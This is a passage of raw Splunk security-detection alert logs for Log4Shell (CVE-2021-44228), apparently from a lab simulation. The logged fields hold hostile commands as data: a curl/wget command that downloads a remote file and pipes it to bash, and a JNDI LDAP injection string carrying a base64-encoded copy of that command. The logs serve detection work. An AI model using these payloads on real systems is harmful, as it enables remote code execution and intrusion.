CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640953, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="PR.DS", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640953, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="PR.DS", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", 